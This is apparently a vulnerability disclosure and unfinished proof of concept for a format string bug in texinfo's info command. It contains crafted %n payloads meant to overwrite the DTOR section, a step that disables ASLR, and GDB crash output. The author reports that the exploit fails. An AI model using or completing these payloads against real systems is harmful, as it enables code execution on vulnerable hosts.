--==+=============================================+==-- --==+ texinfo <= 4.9 format string vuln PoC +==-- --==+=============================================+==-- DISCOVERED BY: Cody Rester WEBSITE: www.codyrester.com --==+=============================================+==-- TIMELINE: --==+=============================================+==-- 11-04-2007 - Discovered bug by fuzzing the input on texinfo 4.8 11-05-2007 - Installed via source version 4.9, bug still there 11-06-2007 - Working on Ubuntu 7.10, Stack seems randomized, the offset and shellcode keeps changing locations 11-07-2007 - Found out how to turn off randomization kernel.randomize_va_space = 0 11-08-2007 - Got the correct offsets and values, but keep getting segfaults. Not sure what to do at this point. DETAILS: --==+=============================================+==-- address@hidden:~$ /usr/local/bin/info --file="%x %x %x %x %x %x %x %x %x %x" info: 0 0 8071870 2 0 0 bffff744 0 bffff6a8 805092e: No such file or directory address@hidden:~$ address@hidden:~$ /usr/local/bin/info --file=BBBAAAAAB%153\$x info: BBBAAAAAB41414141: No such file or directory address@hidden:~$ --==+=============================================+==-- SHELLCODE: 0xbffff9c7 DTOR: 0x08068330 OFFSET: 153 --==+=============================================+==-- address@hidden:~$ /usr/local/bin/info --file=AAA`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%156\$43x%156\$n%156\$50x%157\$n%156\$262x%158\$n%156\$192x%159\$nA info: AAA0�1�2�3� 8068330 8068330 8068330 8068330A: No such file or directory Segmentation fault (core dumped) address@hidden:~$ --==+=============================================+==-- Examining the stack with GDB --==+=============================================+==-- (gdb) run --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n... Starting program: /usr/local/bin/info --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n... info: 0�1�2�3� 8068330 8068330 8068330 8068330...: No such file or directory Program received signal SIGSEGV, Segmentation fault. 0x35756f3d in ?? () (gdb) bt #0 0x35756f3d in ?? () #1 0x080499ab in __do_global_dtors_aux () #2 0x08062c20 in _fini () #3 0xb7ff3a1f in ?? () from /lib/ld-linux.so.2 #4 0xb8001260 in _rtld_global () from /lib/ld-linux.so.2 #5 0x00000000 in ?? () (gdb) info reg eax 0x8068334 134644532 ecx 0xbffff530 -1073744592 edx 0x35756f3d 896888637 ebx 0x8068414 134644756 esp 0xbffff4fc 0xbffff4fc ebp 0xbffff508 0xbffff508 esi 0xb8001668 -1207953816 edi 0x0 0 eip 0x35756f3d 0x35756f3d eflags 0x210202 [ IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) --==+=============================================+==-- CONCLUSION --==+=============================================+==-- All offsets and values have been calculated correctly, but texinfo refuses to execute the shellcode address given. It doesn't look like it's overwritting the DTOR correctly, and the EIP is 0x35756f3d, which is not what I want. So, well, I just wanna get rid of it off my mind for now, I lost 8 hours of sleep last night working on this, only to have it time and time again fail. It's almost there, but I'm not sure how to get it working. Thus, the Proof-of-Concept title. Hopefully someone can take this and get an exploit working. Peace f00s.